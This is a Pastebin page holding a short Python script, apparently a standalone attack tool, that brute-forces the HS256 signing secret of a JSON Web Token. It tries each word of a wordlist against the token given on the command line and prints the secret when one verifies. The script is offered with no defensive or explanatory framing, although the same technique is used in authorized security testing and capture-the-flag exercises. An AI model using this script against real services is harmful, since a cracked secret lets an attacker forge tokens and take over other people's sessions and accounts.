Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import jwt
- from queue import Queue,Empty
- import threading
- import sys
- if len(sys.argv) == 1:
- exit('Provide jwt token')
- def bruteForceJwtSecret(jwtToken,wordListQueue):
- global jwtSecret
- while True:
- try:
- if jwtSecret != None:
- break
- pwd = wordListQueue.get(False)
- jwt.decode(jwtToken, pwd, algorithms=["HS256"])
- jwtSecret = pwd
- print(f"Password found: {jwtSecret}")
- break
- except jwt.exceptions.InvalidSignatureError:
- pass
- except Empty:
- print("Password not found!")
- break
- with open("wiki-100k.txt","r") as file:
- wordList = file.read().split("\n")
- wordListQueue = Queue()
- [wordListQueue.put(word) for word in wordList]
- jwtToken = sys.argv[1]
- jwtSecret = None
- #
- # for _ in range(8):
- # threading.Thread(target=bruteForceJwtSecret,args=(jwtToken,wordListQueue,)).start()
- bruteForceJwtSecret(jwtToken,wordListQueue)
- ### Created By jagata ###
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
